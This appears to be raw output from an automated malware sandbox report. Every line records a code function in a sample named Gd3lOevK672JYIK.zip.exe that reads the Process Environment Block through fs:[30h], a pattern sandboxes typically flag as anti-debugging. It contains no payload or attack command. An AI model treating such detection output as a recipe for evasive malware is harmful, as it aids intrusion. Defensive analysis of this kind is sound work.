                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A2C3 mov eax, dword ptr fs:[00000030h]4_2_0184A2C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A2C3 mov eax, dword ptr fs:[00000030h]4_2_0184A2C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A2C3 mov eax, dword ptr fs:[00000030h]4_2_0184A2C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A2C3 mov eax, dword ptr fs:[00000030h]4_2_0184A2C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A2C3 mov eax, dword ptr fs:[00000030h]4_2_0184A2C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019162D6 mov eax, dword ptr fs:[00000030h]4_2_019162D6
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018502E1 mov eax, dword ptr fs:[00000030h]4_2_018502E1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018502E1 mov eax, dword ptr fs:[00000030h]4_2_018502E1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018502E1 mov eax, dword ptr fs:[00000030h]4_2_018502E1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183823B mov eax, dword ptr fs:[00000030h]4_2_0183823B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0191625D mov eax, dword ptr fs:[00000030h]4_2_0191625D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C8243 mov eax, dword ptr fs:[00000030h]4_2_018C8243
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C8243 mov ecx, dword ptr fs:[00000030h]4_2_018C8243
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183A250 mov eax, dword ptr fs:[00000030h]4_2_0183A250
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846259 mov eax, dword ptr fs:[00000030h]4_2_01846259
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FA250 mov eax, dword ptr fs:[00000030h]4_2_018FA250
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FA250 mov eax, dword ptr fs:[00000030h]4_2_018FA250
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01844260 mov eax, dword ptr fs:[00000030h]4_2_01844260
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01844260 mov eax, dword ptr fs:[00000030h]4_2_01844260
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01844260 mov eax, dword ptr fs:[00000030h]4_2_01844260
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183826B mov eax, dword ptr fs:[00000030h]4_2_0183826B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01842582 mov eax, dword ptr fs:[00000030h]4_2_01842582
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01842582 mov ecx, dword ptr fs:[00000030h]4_2_01842582
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01874588 mov eax, dword ptr fs:[00000030h]4_2_01874588
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E59C mov eax, dword ptr fs:[00000030h]4_2_0187E59C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C05A7 mov eax, dword ptr fs:[00000030h]4_2_018C05A7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C05A7 mov eax, dword ptr fs:[00000030h]4_2_018C05A7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C05A7 mov eax, dword ptr fs:[00000030h]4_2_018C05A7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018645B1 mov eax, dword ptr fs:[00000030h]4_2_018645B1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018645B1 mov eax, dword ptr fs:[00000030h]4_2_018645B1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E5CF mov eax, dword ptr fs:[00000030h]4_2_0187E5CF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E5CF mov eax, dword ptr fs:[00000030h]4_2_0187E5CF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018465D0 mov eax, dword ptr fs:[00000030h]4_2_018465D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A5D0 mov eax, dword ptr fs:[00000030h]4_2_0187A5D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A5D0 mov eax, dword ptr fs:[00000030h]4_2_0187A5D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018425E0 mov eax, dword ptr fs:[00000030h]4_2_018425E0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187C5ED mov eax, dword ptr fs:[00000030h]4_2_0187C5ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187C5ED mov eax, dword ptr fs:[00000030h]4_2_0187C5ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D6500 mov eax, dword ptr fs:[00000030h]4_2_018D6500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E53E mov eax, dword ptr fs:[00000030h]4_2_0186E53E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E53E mov eax, dword ptr fs:[00000030h]4_2_0186E53E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E53E mov eax, dword ptr fs:[00000030h]4_2_0186E53E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E53E mov eax, dword ptr fs:[00000030h]4_2_0186E53E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0186E53E mov eax, dword ptr fs:[00000030h] | 4_2_0186E53E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01848550 mov eax, dword ptr fs:[00000030h] | 4_2_01848550
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01848550 mov eax, dword ptr fs:[00000030h] | 4_2_01848550
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187656A mov eax, dword ptr fs:[00000030h] | 4_2_0187656A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187656A mov eax, dword ptr fs:[00000030h] | 4_2_0187656A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187656A mov eax, dword ptr fs:[00000030h] | 4_2_0187656A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018FA49A mov eax, dword ptr fs:[00000030h] | 4_2_018FA49A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018464AB mov eax, dword ptr fs:[00000030h] | 4_2_018464AB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018744B0 mov ecx, dword ptr fs:[00000030h] | 4_2_018744B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CA4B0 mov eax, dword ptr fs:[00000030h] | 4_2_018CA4B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018404E5 mov ecx, dword ptr fs:[00000030h] | 4_2_018404E5
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01878402 mov eax, dword ptr fs:[00000030h] | 4_2_01878402
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01878402 mov eax, dword ptr fs:[00000030h] | 4_2_01878402
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01878402 mov eax, dword ptr fs:[00000030h] | 4_2_01878402
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0183E420 mov eax, dword ptr fs:[00000030h] | 4_2_0183E420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0183E420 mov eax, dword ptr fs:[00000030h] | 4_2_0183E420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0183E420 mov eax, dword ptr fs:[00000030h] | 4_2_0183E420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0183C427 mov eax, dword ptr fs:[00000030h] | 4_2_0183C427
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h] | 4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h] | 4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h] | 4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h] | 4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h] | 4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h] | 4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h] | 4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187A430 mov eax, dword ptr fs:[00000030h] | 4_2_0187A430
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h] | 4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h] | 4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h] | 4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h] | 4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h] | 4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h] | 4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h] | 4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h] | 4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018FA456 mov eax, dword ptr fs:[00000030h] | 4_2_018FA456
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0186245A mov eax, dword ptr fs:[00000030h] | 4_2_0186245A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0183645D mov eax, dword ptr fs:[00000030h] | 4_2_0183645D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CC460 mov ecx, dword ptr fs:[00000030h] | 4_2_018CC460
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0186A470 mov eax, dword ptr fs:[00000030h] | 4_2_0186A470
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0186A470 mov eax, dword ptr fs:[00000030h] | 4_2_0186A470
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0186A470 mov eax, dword ptr fs:[00000030h] | 4_2_0186A470
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018E678E mov eax, dword ptr fs:[00000030h] | 4_2_018E678E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018407AF mov eax, dword ptr fs:[00000030h] | 4_2_018407AF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018F47A0 mov eax, dword ptr fs:[00000030h] | 4_2_018F47A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184C7C0 mov eax, dword ptr fs:[00000030h] | 4_2_0184C7C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C07C3 mov eax, dword ptr fs:[00000030h] | 4_2_018C07C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018627ED mov eax, dword ptr fs:[00000030h] | 4_2_018627ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018627ED mov eax, dword ptr fs:[00000030h] | 4_2_018627ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018627ED mov eax, dword ptr fs:[00000030h] | 4_2_018627ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CE7E1 mov eax, dword ptr fs:[00000030h] | 4_2_018CE7E1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018447FB mov eax, dword ptr fs:[00000030h] | 4_2_018447FB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018447FB mov eax, dword ptr fs:[00000030h] | 4_2_018447FB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187C700 mov eax, dword ptr fs:[00000030h] | 4_2_0187C700
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01840710 mov eax, dword ptr fs:[00000030h] | 4_2_01840710
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01870710 mov eax, dword ptr fs:[00000030h] | 4_2_01870710
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187C720 mov eax, dword ptr fs:[00000030h] | 4_2_0187C720
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187C720 mov eax, dword ptr fs:[00000030h] | 4_2_0187C720
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BC730 mov eax, dword ptr fs:[00000030h] | 4_2_018BC730
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187273C mov eax, dword ptr fs:[00000030h] | 4_2_0187273C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187273C mov ecx, dword ptr fs:[00000030h] | 4_2_0187273C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187273C mov eax, dword ptr fs:[00000030h] | 4_2_0187273C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187674D mov esi, dword ptr fs:[00000030h] | 4_2_0187674D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187674D mov eax, dword ptr fs:[00000030h] | 4_2_0187674D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187674D mov eax, dword ptr fs:[00000030h] | 4_2_0187674D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CE75D mov eax, dword ptr fs:[00000030h] | 4_2_018CE75D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01840750 mov eax, dword ptr fs:[00000030h] | 4_2_01840750
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01882750 mov eax, dword ptr fs:[00000030h] | 4_2_01882750
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01882750 mov eax, dword ptr fs:[00000030h] | 4_2_01882750
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C4755 mov eax, dword ptr fs:[00000030h] | 4_2_018C4755
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01848770 mov eax, dword ptr fs:[00000030h] | 4_2_01848770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850770 mov eax, dword ptr fs:[00000030h] | 4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01844690 mov eax, dword ptr fs:[00000030h] | 4_2_01844690
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01844690 mov eax, dword ptr fs:[00000030h] | 4_2_01844690
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187C6A6 mov eax, dword ptr fs:[00000030h] | 4_2_0187C6A6
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018766B0 mov eax, dword ptr fs:[00000030h] | 4_2_018766B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187A6C7 mov ebx, dword ptr fs:[00000030h] | 4_2_0187A6C7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187A6C7 mov eax, dword ptr fs:[00000030h] | 4_2_0187A6C7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BE6F2 mov eax, dword ptr fs:[00000030h] | 4_2_018BE6F2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BE6F2 mov eax, dword ptr fs:[00000030h] | 4_2_018BE6F2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BE6F2 mov eax, dword ptr fs:[00000030h] | 4_2_018BE6F2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BE6F2 mov eax, dword ptr fs:[00000030h] | 4_2_018BE6F2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C06F1 mov eax, dword ptr fs:[00000030h] | 4_2_018C06F1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C06F1 mov eax, dword ptr fs:[00000030h] | 4_2_018C06F1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BE609 mov eax, dword ptr fs:[00000030h] | 4_2_018BE609
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0185260B mov eax, dword ptr fs:[00000030h] | 4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0185260B mov eax, dword ptr fs:[00000030h] | 4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0185260B mov eax, dword ptr fs:[00000030h] | 4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0185260B mov eax, dword ptr fs:[00000030h] | 4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0185260B mov eax, dword ptr fs:[00000030h] | 4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0185260B mov eax, dword ptr fs:[00000030h] | 4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0185260B mov eax, dword ptr fs:[00000030h] | 4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01882619 mov eax, dword ptr fs:[00000030h] | 4_2_01882619
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0185E627 mov eax, dword ptr fs:[00000030h] | 4_2_0185E627
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01876620 mov eax, dword ptr fs:[00000030h] | 4_2_01876620
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01878620 mov eax, dword ptr fs:[00000030h] | 4_2_01878620
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184262C mov eax, dword ptr fs:[00000030h] | 4_2_0184262C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0185C640 mov eax, dword ptr fs:[00000030h] | 4_2_0185C640
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187A660 mov eax, dword ptr fs:[00000030h] | 4_2_0187A660
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187A660 mov eax, dword ptr fs:[00000030h] | 4_2_0187A660
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01872674 mov eax, dword ptr fs:[00000030h] | 4_2_01872674
